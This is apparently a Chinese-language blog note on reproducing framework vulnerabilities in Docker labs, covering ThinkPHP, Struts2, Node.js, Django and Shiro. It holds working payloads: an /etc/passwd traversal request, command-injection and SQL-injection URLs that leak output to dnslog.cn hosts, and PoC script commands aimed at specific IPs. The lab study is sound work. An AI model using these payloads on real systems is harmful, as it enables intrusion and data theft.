服务攻防-框架安全(漏洞复现)

关闭靶场

sudo docker-compose down

运行此靶场

sudo docker-compose up -d

查看启动环境

sudo docker ps

运行dockers容器

docker exec -it 64052abd288b /bin/bash

thinkphp框架

thinkphp 2 - rce漏洞复现

docker exec -it 731dbae0e0b5 /bin/bash

集成化工具扫描

可以命令执行

thinkphp/5.0.23-rce

集成化工具利用

thinkphp/5-rce

直接梭哈

thinkphp/in-sqlinjection

Struts2

S2-009

梭哈

struts2 命令执行 (CVE-2016-3081)

直接梭哈

061rce和nc

python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"

python2 S2-061-shell.py http://123.58.224.8:64423

S2-062

python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami

靶场无回显

Node.js

目录穿越

GET /static/../../../a/../../../../etc/passwd HTTP/1.1

CVE-2021-21315

Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315

配合dnslog。Cn带外检测

/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)

Django

CVE-2019-14234

单引号已注入成功,SQL 语句报错:

/admin/vuln/collection/?detail__a%27b=123

创建 cmd_exec:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

调用 cmd_exec 执行命令:

/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20

/shiro-721

shiro-cve_2016_4437

solr

相关推荐
捉鸭子5 分钟前
QQ音乐sign vmp逆向
爬虫·python·网络安全·网络爬虫
lcreek19 分钟前
端口扫描技术实战指南
网络安全·端口扫描
北京聚信万通科技有限公司23 分钟前
汽车供应链–零部件厂商通过EDI对接主机厂全流程指南
安全·汽车·edi·电子数据交换·as2·oftp2
一切皆是因缘际会29 分钟前
结构安全革命:下一代 AI 从 “不可控” 到 “绝对可控” 的范式跃迁
人工智能·安全·ai·架构
KKKlucifer1 小时前
基于行为语义分析的 API 异常流量自适应检测技术
网络·安全·web安全
wanhengidc1 小时前
算力服务器的应用场景
运维·服务器·人工智能·安全·web安全·智能手机
空中海2 小时前
05 鸿蒙APP 测试、性能、安全、发布与生产实践
安全·华为·harmonyos
飞飞传输2 小时前
内外网文件交换系统产品推荐:高密网低密网摆渡更安全高效
大数据·运维·安全
TENSORTEC腾视科技2 小时前
让安全驾驶有“AI”相伴|腾视科技DMS视频监控一体机,守护每一次出行
大数据·人工智能·科技·安全·ai·零售·无人叉车及智能调度系统解决方案